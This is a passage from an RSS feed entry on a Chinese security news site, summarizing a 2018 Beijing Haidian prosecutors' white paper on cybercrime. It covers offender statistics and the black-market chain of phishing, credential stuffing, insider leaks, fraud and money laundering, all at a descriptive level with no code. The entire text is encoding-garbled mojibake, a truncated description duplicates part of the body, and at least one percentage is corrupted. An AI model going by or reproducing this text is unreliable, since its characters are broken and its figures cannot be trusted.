æä¾›ä¾µå…¥ã€éžæ³•控制计算机信æ¯ç³»ç»Ÿç¨‹åºã€å·¥å…·ã€‚     ä¸Šæ¸¸çŠ¯ç½ªé“¾ä¸æœ‰éƒ¨åˆ†è¡Œä¸ºäººå› 掌æ¡è¾ƒé«˜çš„æŠ€æœ¯è€Œç¼–写程åºã€å‘çŽ°æ¼æ´ž,客观上为下游犯罪æä¾›äº†æŠ€æœ¯å·¥å…·ã€‚ ä¿¡æ¯ä¼ æ’æœåŠ¡è€… æ‰°ä¹±æ— çº¿ç”µé€šè®¯ç®¡ç†ç§©åºè¡Œä¸ºäººé€šè¿‡ä½¿ç”¨â€œä¼ªåŸºç«™â€è®¾å¤‡å‘é€å¸¦æœ‰æœ¨é©¬ç—…毒ã€é’“鱼网站的手机çŸä¿¡,诱使公众点击,以获å–公民个人信æ¯ã€é“¶è¡Œå¡è´¦å·å¯†ç ã€ç¤¾äº¤ç½‘络信æ¯ç‰ï¼Œè¿›è€Œä»Žäº‹ç›—å–银行账户财产ã€ç²¾å‡†è¯ˆéª—ç‰ä¸‹æ¸¸çŠ¯ç½ªè¡Œä¸ºã€‚ 2 䏿¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž ç½‘ç»œçŠ¯ç½ªé»‘è‰²äº§ä¸šé“¾ä¸æ¸¸çš„目的,是ä¾é 犯罪行为获å–具有å˜çŽ°ä»·å€¼çš„ç”Ÿäº§è¦ç´ ,而生产è¦ç´ 的具体内容和价值å–决于其使用的场景。 社会工程å¦åŠé’“鱼弿”»å‡» 围绕计算机信æ¯ç³»ç»Ÿå®‰å…¨æ”»é˜²æŠ€æœ¯è¡ç”Ÿå‡ºè¯¸å¤šä¸åŒå¦ç§‘,其䏿œ€ä¸ºè‘—å的是社会工程å¦( Social Engineering)。在社会工程å¦åŸºç¡€ä¹‹ä¸Š,结åˆäº†è®¡ç®—机信æ¯ç³»ç»ŸæŠ€æœ¯çš„钓鱼弿”»å‡»,å·²ç»æˆä¸ºè¿‘å¹´æ¥è¿æ³•行为人员常用的伎俩。 撞库 撞库,本质上是利用用户在ä¸åŒåœºæ™¯ä¸å€¾å‘使用åŒä¸€è´¦æˆ·ä¸Žå¯†ç çš„è¡Œä¸ºä¹ æƒ¯ï¼Œä»¥æ³„éœ²çš„ç”¨æˆ·èº«ä»½è®¤è¯ä¿¡æ¯ä¸ºæ•°æ®æ ·æœ¬,通过计算机信æ¯ç³»ç»Ÿç¨‹åºæ‰¹é‡çš„å°è¯•登陆他方网站的一ç§çŠ¯ç½ªæ‰‹æ®µ,ç›¸è¾ƒäºŽä¼ ç»Ÿçš„å¯†ç 穷举方法更为高效,æ˜¯é»‘è‰²äº§ä¸šé“¾ä¸æ¸¸ä¸æœ€ä¸ºé‡è¦ä¹Ÿæ˜¯æœ€ä¸ºå¸¸è§çš„一ç§çŠ¯ç½ªå½¢æ€ã€‚ 内部人员作案 内外部人员勾结作案,å·²ç»æˆä¸ºä¸æ¸¸é»‘äº§å®žæ–½è¿æ³•çŠ¯ç½ªè¡Œä¸ºçš„å¸¸è§æ¨¡å¼ã€‚å› å†…éƒ¨äººå‘˜ç›¸è¾ƒäºŽå¤–éƒ¨äººå‘˜,往往具有更高的内部æƒé™,了解更多有助于实施犯罪行为信æ¯,天然具有适宜的犯罪机会,犯罪行为更éšè”½,æˆæœ¬æ›´ä½Ž,影哿›´ä¸ºä¸¥é‡ã€‚内部人员往往与外部人员尤其是黑产组织勾结,éžæ³•获å–ä¼ä¸šè®¡ç®—机信æ¯ç³»ç»ŸæŽ§åˆ¶æƒã€‚ 或者内部人员出于利益,éžæ³•出售ä¼ä¸šä¿å˜çš„计算机信æ¯ç³»ç»Ÿæ•°æ®ã€‚ å®‰å…¨æ¼æ´žæŒ–掘 å®‰å…¨æ¼æ´žæŒ–掘是指通过技术手段å‘现计算机信æ¯ç³»ç»Ÿå˜åœ¨çš„ã€å…·æœ‰åˆ©ç”¨ä»·å€¼çš„安全缺陷。 è¿æ³•行为人å¯ä»¥é€šè¿‡å¯¹è®¡ç®—机信æ¯ç³»ç»Ÿå®‰å…¨æ¼æ´žè¿›è¡Œæ”»å‡»,绕过安全防范机制,ä¸Šä¼ æœ¨é©¬ã€ç—…毒ç‰ç ´å性计算机程åº,è¾¾åˆ°æŽ§åˆ¶ç›®æ ‡è®¡ç®—æœºä¿¡æ¯ç³»ç»Ÿçš„目的。 支付场景ä¸çš„å®‰å…¨æ¼æ´žå¯èƒ½ä¼šå¯¼è‡´è¢«å®³æ–¹çš„ç›´æŽ¥ç»æµŽæŸå¤±ã€‚ ç¡¬ä»¶è®¾å¤‡çš„å®‰å…¨æ¼æ´žï¼Œå¯èƒ½ç›´æŽ¥å¨èƒå…¬æ°‘的个人信æ¯çš„安全,å…¶ä¸å…·æœ‰ä»£è¡¨æ„义的是家åºè·¯ç”±å™¨ä¸Žæ™ºèƒ½æ‘„åƒå¤´ã€‚ 3 ä¸‹æ¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž ä¾µçŠ¯å…¬æ°‘ä¸ªäººä¿¡æ¯ å…¬æ°‘ä¸ªäººä¿¡æ¯ä½œä¸ºäº’è”网信æ¯è½åœ°çš„关键一环,æˆä¸ºçŠ¯ç½ªåˆ†å觊觎的对象。实践ä¸å¤šä»¥é»‘客攻击ã€å†…部人员泄露ç‰å½¢å¼å˜åœ¨ã€‚ 电信网络诈骗 电信网络诈骗犯罪涉åŠè¯ˆéª—罪ã€ä¿¡ç”¨å¡è¯ˆéª—ç‰ç½ªå,主è¦åŒ…括以下两ç§ç±»åž‹ï¼š é€šè¿‡ä¸Šæ¸¸é’“é±¼ç½‘ç«™ã€æœ¨é©¬ç—…毒获å–银行账å·ã€å¯†ç ç‰è´¢äº§ä¿¡æ¯ï¼›é€šè¿‡ä¸æ¸¸çš„æ•°æ®æœåŠ¡å•†æ¸…æ´—å¹¶è½¬å–;下游犯罪行为人使用该账å·å’Œå¯†ç ç›—å–账户ä¸çš„å˜æ¬¾ã€‚ 行为人通过上ã€ä¸æ¸¸çš„犯罪行为或数æ®å¹³å°èŽ·å–了精确的公民个人信æ¯,如姓åã€èŒä¸šã€ç”µè¯å·ç ã€èº«ä»½è¯ä¿¡æ¯ç‰ä¿¡æ¯,通过打电è¯çš„æ–¹å¼è¿›è¡Œç²¾å‡†è¯ˆéª—。 在电信网络诈骗犯罪案件ä¸,为逃é¿é’±æ¬¾è¢«è¿½è¸ª,诈骗行为的下游已ç»å½¢æˆäº†ä¸€ä¸ªä¸“门洗钱端。 行为人使用自己或者他人的身份è¯åŠžç†å¤šå¼ 银行å¡,æä¾›ç»™è¯ˆéª—犯罪集团用于洗钱。 诈骗行为人在进行电è¯è¯ˆéª—时将骗å–的钱款直接投注到彩票站è´ä¹°å½©ç¥¨,éšåŽå°†å½©ç¥¨è¿”款打入自己所控制的账å·ã€‚ 行为人使用他人的银行å¡è´¦æˆ·åŠžç†ç§»åЍPOS机,ä¸“ä¸ºä»–äººå–æ¬¾ã€‚ 刷å•诈骗 ä¼ä¸šåœ¨å¯¹æ——下产å“进行推广时,常采å–补贴ã€å¥–励的机制获å–用户。在下游产业链ä¸å‡ºçŽ°äº†åˆ©ç”¨ä¼ä¸šçš„奖励机制而专门进行批é‡ä¸‹è½½ã€æ³¨å†Œäº§å“,以骗å–ä¼ä¸šè¡¥è´´çš„行为。 敲诈勒索 行为人通常采å–ä¸¤ç§æ–¹å¼è¿›è¡Œæ•²è¯ˆå‹’ç´¢ã€‚ä¸€ç§æ˜¯é€šè¿‡â€œåƒµå°¸ç½‘络â€ä¹Ÿå°±æ˜¯ä¿—称的“肉鸡â€è¿›è¡Œç½‘络攻击;å¦ä¸€ç§æ˜¯é€šè¿‡ä¾µå…¥å…¬å¸æœåŠ¡å™¨çªƒå–å…¬å¸è¿è¥èµ„料从而敲诈勒索被害å•ä½ã€‚ åˆ©ç”¨å……å€¼ç³»ç»Ÿæ¼æ´žå……值 éšç€â€œäº’è”网+â€ã€ä¿¡æ¯åŒ–建设的å‘展,具有公共æœåŠ¡èŒèƒ½çš„æ”¿åºœä¿¡æ¯ç³»ç»Ÿã€äº’è”网消费平å°ç‰å¼€å§‹è®¾ç½®å…·æœ‰ä¸€å®šå‚¨å€¼åŠŸèƒ½çš„å¹³å°,ç”±äºŽç³»ç»Ÿæœ¬èº«çš„æ¼æ´žæˆ–维护ä¸åŠæ—¶ç‰åŽŸå› ,给了犯罪分å以å¯ä¹˜ä¹‹æœºã€‚ 五   ç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ª éšç€äº’è”网应用场景和互è”网技术的普åŠ,ä¼ ç»ŸçŠ¯ç½ªä¸Žç½‘ç»œå¹³å°ã€ç½‘络技术相结åˆ,开始出现了赌åšã€è´©æ¯’ã€è‰²æƒ…ç‰ä¼ 统犯罪å‘ç½‘ç»œç¤¾ä¼šçš„å»¶ä¼¸å’Œæ‰©å¼ çš„çŽ°è±¡ï¼Œè¡ç”Ÿå‡ºç½‘络赌åšã€ç½‘络色情ã€è´©å–毒å“ã€äº’è”网金èžè¯ˆéª—ç‰çŠ¯ç½ª,并出现从PC端å‘移动互è”端蔓延的趋势。 1 ä¼ æ’æ·«ç§½ç‰©å“ 微信群ç‰ç¤¾äº¤å·¥å…·çš„å‘展大大æé«˜äº†ä¿¡æ¯ä¼ æ’的效率,由于信æ¯é‡å·¨å¤§,监管难度高,导致淫秽信æ¯åœ¨ç½‘络空间泛滥。 […]]]></description>
1802 <content:encoded><![CDATA[<p style="text-align: justify;"><b style="color: rgb(0, 176, 80);">上个月,北京市海淀区人民检察院å‘å¸ƒäº†ã€Šç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦ã€‹ã€‚</b></p>
1803<p style="text-align: justify;"><img alt="2018-07-12 110125.jpg" src="http://image.3001.net/images/20180719/15319932858474.jpg!small" width="690" height="451"></p>
1804<p style="text-align: justify;">ã€Šç™½çš®ä¹¦ã€‹æ ¹æ®æµ·æ·€æ£€å¯Ÿé™¢2016å¹´9月以æ¥å—ç†çš„450èµ·ç½‘ç»œçŠ¯ç½ªæ¡ˆä»¶ï¼Œä»Žå¸æ³•的角度,结åˆå…·ä½“æ¡ˆä¾‹ï¼Œæ€»ç»“äº†æˆ‘å›½è¿‘å‡ å¹´æ¥äº’è”网黑产行业的现状。</p>
1805<p><img alt="æ£€å¯Ÿé™¢å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦2.png" src="http://image.3001.net/images/20180719/15319933048986.png!small" width="690" height="389"></p>
1806<p style="text-align: center;">《白皮书》æ€ç»´å¯¼å›¾ï¼Œç‚¹å‡»å›¾ç‰‡å¯æŸ¥çœ‹å¤§å›¾</p>
1807<h2><strong>ä¸€ã€æ¡ˆä»¶åŸºæœ¬æƒ…况</strong></h2>
1808<p style="text-align: justify;">2016å¹´9月以æ¥,北京市海淀区人民检察院å—ç†ç½‘络犯罪案件450件(1076人),å…¶ä¸å®¡æŸ¥é€®æ•245件(588人),审查起诉205件(488人),涉åŠ27个罪å。</p>
1809<p style="text-align: center;"><b><img alt="微信图片_20180719145701.jpg" src="http://image.3001.net/images/20180719/15319933194946.jpg!small" width="402" height="465"></b>å„ç±»åž‹çŠ¯ç½ªå æ¯”</p>
1810</p>
1811<h2><strong>äºŒã€æ¡ˆä»¶ç‰¹å¾</strong></h2>
1812</p>
1813<h3>1 低龄ã€ä½Žå¦åŽ†åŒ–</h3>
1814</p>
1815<p style="text-align: justify;">犯罪主体呈现低龄ã€ä½Žå¦åŽ†åŒ–ç‰¹å¾ã€‚</p>
1816<p>犯罪普é呈现年轻低龄化:</p>
1817<blockquote><p>1990å¹´-1999年出生的221人,å æ¯”37.58%ï¼›</p>
1818<p>1980å¹´-1989年出生283人,å æ¯”A812%ï¼›</p>
1819<p>1970年以å‰å‡ºç”Ÿäººæ•°ä»…å 14.11%。 </p>
1820</blockquote>
1821<p>犯罪的行为人普éå¦åŽ†è¾ƒä½Žï¼š</p>
1822<blockquote><p>本科åŠå…¶ä»¥ä¸Šå¦åކ82人,ä»…å 21%ï¼›</p>
1823<p>高ä¸ã€é«˜èŒæ•™è‚²ä¸»ä½“68人,åˆä¸ã€ä¸ä¸“ã€å°å¦ç‰æ•™è‚²ä¸»ä½“242人,å 62.5%。</p>
1824<p>男性主体å 较大比é‡,审查起诉案件ä¸ç”·æ€§379人,å æ¯”77.66%。</p>
1825</blockquote>
1826<h3>2 跨地域作案</h3>
1827</p>
1828<p style="text-align: justify;">çªç ´äº†ä¼ 统地域空间的é™åˆ¶,è·¨åœ°åŸŸä½œæ¡ˆç‰¹å¾æ˜Žæ˜¾ã€‚作案地点涵盖全国28个çœã€å¸‚ã€è‡ªæ²»åŒºã€‚</p>
1829<blockquote><p>一是犯罪行为实施地和犯罪结果地之间跨地域。</p>
1830<p>二是犯罪主体之间跨地域。</p>
1831<p>三是掩饰ã€éšçž’赃物跨区域。</p>
1832</blockquote>
1833<h3>3 产业化</h3>
1834</p>
1835<p style="text-align: justify;">犯罪行为产业化,æ—¥æ¸å½¢æˆå®Œæ•´ã€é—åˆçš„产业链æ¡ã€‚è¾ƒä¹‹äºŽä¼ ç»ŸçŠ¯ç½ª,网络犯罪的产业化链æ¡ç‰¹å¾æ˜Žæ˜¾,产业链的上ã€ä¸ã€ä¸‹æ¸¸çŠ¯ç½ªåˆ†å·¥æ˜Žç¡®ã€‚</p>
1836</p>
1837<h3>4 组织化</h3>
1838</p>
1839<p>犯罪组织多以公å¸ã€é›†å›¢çš„å½¢æ€å‡ºçŽ°ã€‚ä»¥æ³¨å†Œå…¬å¸å½¢å¼,æœ‰ç»„ç»‡ã€æœ‰è§„模地实施犯罪行为。</p>
1840</p>
1841<h3>5 范围广</h3>
1842</p>
1843<p>å—害人数多,犯罪数é¢å¤§,å½±å“范围广。</p>
1844</p>
1845<h3>6 å…¨çƒåŒ–</h3>
1846</p>
1847<p style="text-align: justify;">跨国犯罪趋势增强,å…¨çƒåŒ–ç‰¹å¾æ˜Žæ˜¾ã€‚ </p>
1848</p>
1849<h2><strong>ä¸‰ã€æ¡ˆä»¶ç±»åž‹</strong></h2>
1850</p>
1851<p style="text-align: justify;">网络空间å‘ç”Ÿçš„è¿æ³•犯罪行为,既有å¯èƒ½æ˜¯åˆ©ç”¨ç½‘ç»œå®žæ–½çš„ä¼ ç»Ÿè¿æ³•犯罪,也å¯èƒ½æ˜¯é’ˆå¯¹ç½‘ç»œã€æ•°æ®æœ¬èº«çš„è¿æ³•çŠ¯ç½ªè¡Œä¸ºã€‚æœ¬æ–‡å°†ç½‘ç»œçŠ¯ç½ªåˆ†ä¸ºï¼šç½‘ç»œé»‘äº§çŠ¯ç½ªå’Œç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ªã€‚</p>
1852<blockquote><p>网络黑产犯罪以计算机数æ®ã€ç¨‹åºç³»ç»Ÿæˆ–者软件ç‰ä½œä¸ºçŠ¯ç½ªå¯¹è±¡,å½¢æˆäº†ä¸€æ¡å°é—的产业链。上游æä¾›å·¥å…·å’Œå¹³å°ï¼Œä¸æ¸¸èŽ·å–ä¿¡æ¯ã€æ¸…æ´—æ•°æ®,下游精准诈骗产ã€ç›—窃财产,呈现产业化ã€å…¬å¸åŒ–ã€å¹³å°åŒ–的特å¾ï¼Œå¤§å¤§é™ä½Žäº†çŠ¯ç½ªæˆæœ¬,æé«˜äº†çŠ¯ç½ªæ•ˆçŽ‡ã€‚å®žè·µä¸æ¤ç±»æ¡ˆä»¶ä»¥ç ´å计算机信æ¯ç³»ç»Ÿç½ªã€éžæ³•获å–计算机信æ¯ç³»ç»Ÿæ•°æ®ç½ªã€ä¾µçŠ¯å…¬æ°‘ä¸ªäººä¿¡æ¯ç½ªä¸ºä¸»ã€‚</p>
1853<p>ä¼ ç»ŸçŠ¯ç½ªçš„ç½‘ç»œåŒ–,æ˜¯çŽ°å®žçš„çŠ¯ç½ªä¸»ä½“åˆ©ç”¨ä¿¡æ¯æŠ€æœ¯åœ¨ç½‘ç»œç©ºé—´å®žæ–½çš„çŠ¯ç½ªè¡Œä¸º,æ²¡æœ‰åˆ›è®¾æ–°çš„æ³•å¾‹å…³ç³»ã€‚ç½‘ç»œç©ºé—´åªæ˜¯çŠ¯ç½ªçš„è½½ä½“,è®¡ç®—æœºåªæ˜¯è¾…åŠ©æ‰‹æ®µã€‚å¦‚è½¬ç§»åˆ°çº¿ä¸Šçš„éžæ³•叿”¶å…¬ä¼—å˜æ¬¾ã€é›†èµ„诈骗ç‰çŠ¯ç½ªã€‚æ¤å¤–,ä¼ æ’æ·«ç§½ç‰©å“牟利罪ã€å¼€è®¾èµŒåœºç½ªç‰ä¼ 统犯罪也日æ¸å¤šå‘,呈现出新的特点。</p>
1854</blockquote>
1855<h2><strong>å››ã€ç½‘络黑产犯罪</strong></h2>
1856</p>
1857<p style="text-align: justify;">网络黑产已ç»ä»ŽåŽŸå§‹ç²—æ”¾çš„ä¼ æ’æœ¨é©¬ç—…毒ã€ç”µè¯è¯ˆéª—转化为更为先进的拖库撞库ã€ç²¾å‡†è¯ˆéª—,å½¢æˆå分æˆç†Ÿçš„è¿ä½œæ¨¡å¼,äº§ä¸šé“¾å¤æ‚ã€éšè”½ã€å®Œæ•´ã€é«˜æ•ˆã€‚</p>
1858</p>
1859<blockquote><p style="text-align: justify;">上游技术供应商,承担ç€åˆ¶ä½œæœ¨é©¬ã€æ¶æ„代ç 肉鸡网络ã€åЍæ€ipéžæ³•æœåŠ¡ç‰æŠ€æœ¯å·¥å…·æœåŠ¡;</p>
1860</p>
1861<p style="text-align: justify;">䏿¸¸æ•°æ®æœåС商ã€é»‘市交易平å°,在产业链ä¸å……当数æ®ç”Ÿäº§è€…和交易æœåŠ¡æä¾›è€…的角色;</p>
1862</p>
1863<p style="text-align: justify;">ä¸‹æ¸¸è¡Œä¸ºäººåˆ©ç”¨ä¸æ¸¸çš„æ•°æ®å’Œå¹³å°å®žçŽ°ç›´æŽ¥è¯ˆéª—ã€â€œè–…羊毛â€ã€æµé‡åŠ«æŒç‰çŠ¯ç½ªã€‚</p>
1864</blockquote>
1865<p style="text-align: justify;">在该产业链ä¸,基于行为人目的的ä¸åŒ,上ã€ä¸ã€ä¸‹æ¸¸å¯ä»¥ä»»æ„组åˆ,å½¢æˆå…¸åž‹æˆ–éžå…¸åž‹çš„网络黑产犯罪。</p>
1866</p>
1867<h3>1 上游犯罪产业链分æž</h3>
1868</p>
1869<p style="text-align: justify;">上游犯罪的出现是网络黑产产业化的体现。</p>
1870</p>
1871<p style="text-align: justify;"><strong>ç½‘ç»œå¹³å°æä¾›è€…</strong></p>
1872</p>
1873<p style="text-align: justify;">éžæ³•利用信æ¯ç½‘络。</p>
1874<blockquote><p>ä¸ºå®žæ–½çŠ¯ç½ªè€Œä¸“é—¨æž¶è®¾éžæ³•网站,多数用于实施“钓鱼诈骗â€,属于电信诈骗犯罪ä¸ä¸å¯æˆ–缺的关键环节。</p>
1875<p>专门黑客类网站æˆä¸ºçŠ¯ç½ªæ–¹æ³•ã€çŠ¯ç½ªå·¥å…·ã€è¿æ³•ä¿¡æ¯çš„呿ºåœ°ã€‚</p>
1876<p>QQ群ã€å¾®ä¿¡ç¾¤ç‰é€šè®¯ç¾¤ç»„便—§æ˜¯è¿æ³•ä¿¡æ¯äº¤æ˜“ã€äº¤æ¢çš„ä¸»è¦æ¸ é“ã€‚å¤šæ•°è¿æ³•行为人倾å‘选择使用第三方支付æœåС平å°è¿›è¡Œèµ„金结算,而网络æœåŠ¡æä¾›è€…对公民个人éšç§ä¿æŠ¤å’Œä¾¦æŸ¥æœºå…³å–è¯éœ€æ±‚之间的矛盾日益凸显。</p>
1877</blockquote>
1878<p style="text-align: justify;"><strong>技术工具æä¾›è€…</strong></p>
1879</p>
1880<p style="text-align: justify;">æä¾›ä¾µå…¥ã€éžæ³•控制计算机信æ¯ç³»ç»Ÿç¨‹åºã€å·¥å…·ã€‚ </p>
1881</p>
1882<p style="text-align: justify;">ä¸Šæ¸¸çŠ¯ç½ªé“¾ä¸æœ‰éƒ¨åˆ†è¡Œä¸ºäººå› 掌æ¡è¾ƒé«˜çš„æŠ€æœ¯è€Œç¼–写程åºã€å‘çŽ°æ¼æ´ž,客观上为下游犯罪æä¾›äº†æŠ€æœ¯å·¥å…·ã€‚</p>
1883</p>
1884<p style="text-align: justify;"><strong>ä¿¡æ¯ä¼ æ’æœåŠ¡è€…</strong></p>
1885</p>
1886<p style="text-align: justify;">æ‰°ä¹±æ— çº¿ç”µé€šè®¯ç®¡ç†ç§©åºè¡Œä¸ºäººé€šè¿‡ä½¿ç”¨â€œä¼ªåŸºç«™â€è®¾å¤‡å‘é€å¸¦æœ‰æœ¨é©¬ç—…毒ã€é’“鱼网站的手机çŸä¿¡,诱使公众点击,以获å–公民个人信æ¯ã€é“¶è¡Œå¡è´¦å·å¯†ç ã€ç¤¾äº¤ç½‘络信æ¯ç‰ï¼Œè¿›è€Œä»Žäº‹ç›—å–银行账户财产ã€ç²¾å‡†è¯ˆéª—ç‰ä¸‹æ¸¸çŠ¯ç½ªè¡Œä¸ºã€‚</p>
1887</p>
1888<h3>2 䏿¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž</h3>
1889</p>
1890<p style="text-align: justify;">ç½‘ç»œçŠ¯ç½ªé»‘è‰²äº§ä¸šé“¾ä¸æ¸¸çš„目的,是ä¾é 犯罪行为获å–具有å˜çŽ°ä»·å€¼çš„ç”Ÿäº§è¦ç´ ,而生产è¦ç´ 的具体内容和价值å–决于其使用的场景。</p>
1891</p>
1892<p style="text-align: justify;"><strong>社会工程å¦åŠé’“鱼弿”»å‡»</strong></p>
1893</p>
1894<p style="text-align: justify;">围绕计算机信æ¯ç³»ç»Ÿå®‰å…¨æ”»é˜²æŠ€æœ¯è¡ç”Ÿå‡ºè¯¸å¤šä¸åŒå¦ç§‘,其䏿œ€ä¸ºè‘—å的是社会工程å¦( Social Engineering)。在社会工程å¦åŸºç¡€ä¹‹ä¸Š,结åˆäº†è®¡ç®—机信æ¯ç³»ç»ŸæŠ€æœ¯çš„钓鱼弿”»å‡»,å·²ç»æˆä¸ºè¿‘å¹´æ¥è¿æ³•行为人员常用的伎俩。</p>
1895</p>
1896<p style="text-align: justify;"><strong>撞库</strong></p>
1897</p>
1898<p style="text-align: justify;">撞库,本质上是利用用户在ä¸åŒåœºæ™¯ä¸å€¾å‘使用åŒä¸€è´¦æˆ·ä¸Žå¯†ç çš„è¡Œä¸ºä¹ æƒ¯ï¼Œä»¥æ³„éœ²çš„ç”¨æˆ·èº«ä»½è®¤è¯ä¿¡æ¯ä¸ºæ•°æ®æ ·æœ¬,通过计算机信æ¯ç³»ç»Ÿç¨‹åºæ‰¹é‡çš„å°è¯•登陆他方网站的一ç§çŠ¯ç½ªæ‰‹æ®µ,ç›¸è¾ƒäºŽä¼ ç»Ÿçš„å¯†ç 穷举方法更为高效,æ˜¯é»‘è‰²äº§ä¸šé“¾ä¸æ¸¸ä¸æœ€ä¸ºé‡è¦ä¹Ÿæ˜¯æœ€ä¸ºå¸¸è§çš„一ç§çŠ¯ç½ªå½¢æ€ã€‚</p>
1899</p>
1900<p style="text-align: justify;"><strong>内部人员作案</strong></p>
1901</p>
1902<p style="text-align: justify;">内外部人员勾结作案,å·²ç»æˆä¸ºä¸æ¸¸é»‘äº§å®žæ–½è¿æ³•çŠ¯ç½ªè¡Œä¸ºçš„å¸¸è§æ¨¡å¼ã€‚å› å†…éƒ¨äººå‘˜ç›¸è¾ƒäºŽå¤–éƒ¨äººå‘˜,往往具有更高的内部æƒé™,了解更多有助于实施犯罪行为信æ¯,天然具有适宜的犯罪机会,犯罪行为更éšè”½,æˆæœ¬æ›´ä½Ž,影哿›´ä¸ºä¸¥é‡ã€‚内部人员往往与外部人员尤其是黑产组织勾结,éžæ³•获å–ä¼ä¸šè®¡ç®—机信æ¯ç³»ç»ŸæŽ§åˆ¶æƒã€‚</p>
1903</p>
1904<p style="text-align: justify;">或者内部人员出于利益,éžæ³•出售ä¼ä¸šä¿å˜çš„计算机信æ¯ç³»ç»Ÿæ•°æ®ã€‚</p>
1905</p>
1906<p style="text-align: justify;"><strong>å®‰å…¨æ¼æ´žæŒ–掘</strong></p>
1907</p>
1908<p style="text-align: justify;">å®‰å…¨æ¼æ´žæŒ–掘是指通过技术手段å‘现计算机信æ¯ç³»ç»Ÿå˜åœ¨çš„ã€å…·æœ‰åˆ©ç”¨ä»·å€¼çš„安全缺陷。</p>
1909<blockquote><p>è¿æ³•行为人å¯ä»¥é€šè¿‡å¯¹è®¡ç®—机信æ¯ç³»ç»Ÿå®‰å…¨æ¼æ´žè¿›è¡Œæ”»å‡»,绕过安全防范机制,ä¸Šä¼ æœ¨é©¬ã€ç—…毒ç‰ç ´å性计算机程åº,è¾¾åˆ°æŽ§åˆ¶ç›®æ ‡è®¡ç®—æœºä¿¡æ¯ç³»ç»Ÿçš„目的。</p>
1910<p>支付场景ä¸çš„å®‰å…¨æ¼æ´žå¯èƒ½ä¼šå¯¼è‡´è¢«å®³æ–¹çš„ç›´æŽ¥ç»æµŽæŸå¤±ã€‚</p>
1911<p>ç¡¬ä»¶è®¾å¤‡çš„å®‰å…¨æ¼æ´žï¼Œå¯èƒ½ç›´æŽ¥å¨èƒå…¬æ°‘的个人信æ¯çš„安全,å…¶ä¸å…·æœ‰ä»£è¡¨æ„义的是家åºè·¯ç”±å™¨ä¸Žæ™ºèƒ½æ‘„åƒå¤´ã€‚</p>
1912</blockquote>
1913<h3>3 下游犯罪产业链分æž</h3>
1914</p>
1915<p style="text-align: justify;"><strong>侵犯公民个人信æ¯</strong></p>
1916</p>
1917<p style="text-align: justify;">公民个人信æ¯ä½œä¸ºäº’è”网信æ¯è½åœ°çš„关键一环,æˆä¸ºçŠ¯ç½ªåˆ†å觊觎的对象。实践ä¸å¤šä»¥é»‘客攻击ã€å†…部人员泄露ç‰å½¢å¼å˜åœ¨ã€‚</p>
1918</p>
1919<p style="text-align: justify;"><strong>电信网络诈骗</strong></p>
1920</p>
1921<p style="text-align: justify;">电信网络诈骗犯罪涉åŠè¯ˆéª—罪ã€ä¿¡ç”¨å¡è¯ˆéª—ç‰ç½ªå,主è¦åŒ…括以下两ç§ç±»åž‹ï¼š</p>
1922<blockquote><p>é€šè¿‡ä¸Šæ¸¸é’“é±¼ç½‘ç«™ã€æœ¨é©¬ç—…毒获å–银行账å·ã€å¯†ç ç‰è´¢äº§ä¿¡æ¯ï¼›é€šè¿‡ä¸æ¸¸çš„æ•°æ®æœåŠ¡å•†æ¸…æ´—å¹¶è½¬å–;下游犯罪行为人使用该账å·å’Œå¯†ç ç›—å–账户ä¸çš„å˜æ¬¾ã€‚</p>
1923<p>行为人通过上ã€ä¸æ¸¸çš„犯罪行为或数æ®å¹³å°èŽ·å–了精确的公民个人信æ¯,如姓åã€èŒä¸šã€ç”µè¯å·ç ã€èº«ä»½è¯ä¿¡æ¯ç‰ä¿¡æ¯,通过打电è¯çš„æ–¹å¼è¿›è¡Œç²¾å‡†è¯ˆéª—。</p>
1924</blockquote>
1925<p>在电信网络诈骗犯罪案件ä¸,为逃é¿é’±æ¬¾è¢«è¿½è¸ª,诈骗行为的下游已ç»å½¢æˆäº†ä¸€ä¸ªä¸“门洗钱端。</p>
1926<blockquote><p>行为人使用自己或者他人的身份è¯åŠžç†å¤šå¼ 银行å¡,æä¾›ç»™è¯ˆéª—犯罪集团用于洗钱。</p>
1927<p>诈骗行为人在进行电è¯è¯ˆéª—时将骗å–的钱款直接投注到彩票站è´ä¹°å½©ç¥¨,éšåŽå°†å½©ç¥¨è¿”款打入自己所控制的账å·ã€‚</p>
1928<p>行为人使用他人的银行å¡è´¦æˆ·åŠžç†ç§»åЍPOS机,ä¸“ä¸ºä»–äººå–æ¬¾ã€‚</p>
1929</blockquote>
1930<p style="text-align: justify;"><strong>刷å•诈骗</strong></p>
1931</p>
1932<p style="text-align: justify;">ä¼ä¸šåœ¨å¯¹æ——下产å“进行推广时,常采å–补贴ã€å¥–励的机制获å–用户。在下游产业链ä¸å‡ºçŽ°äº†åˆ©ç”¨ä¼ä¸šçš„奖励机制而专门进行批é‡ä¸‹è½½ã€æ³¨å†Œäº§å“,以骗å–ä¼ä¸šè¡¥è´´çš„行为。</p>
1933</p>
1934<p style="text-align: justify;"><strong>敲诈勒索</strong></p>
1935</p>
1936<p style="text-align: justify;">行为人通常采å–ä¸¤ç§æ–¹å¼è¿›è¡Œæ•²è¯ˆå‹’ç´¢ã€‚ä¸€ç§æ˜¯é€šè¿‡â€œåƒµå°¸ç½‘络â€ä¹Ÿå°±æ˜¯ä¿—称的“肉鸡â€è¿›è¡Œç½‘络攻击;å¦ä¸€ç§æ˜¯é€šè¿‡ä¾µå…¥å…¬å¸æœåŠ¡å™¨çªƒå–å…¬å¸è¿è¥èµ„料从而敲诈勒索被害å•ä½ã€‚</p>
1937</p>
1938<p style="text-align: justify;"><strong>åˆ©ç”¨å……å€¼ç³»ç»Ÿæ¼æ´žå……值</strong></p>
1939</p>
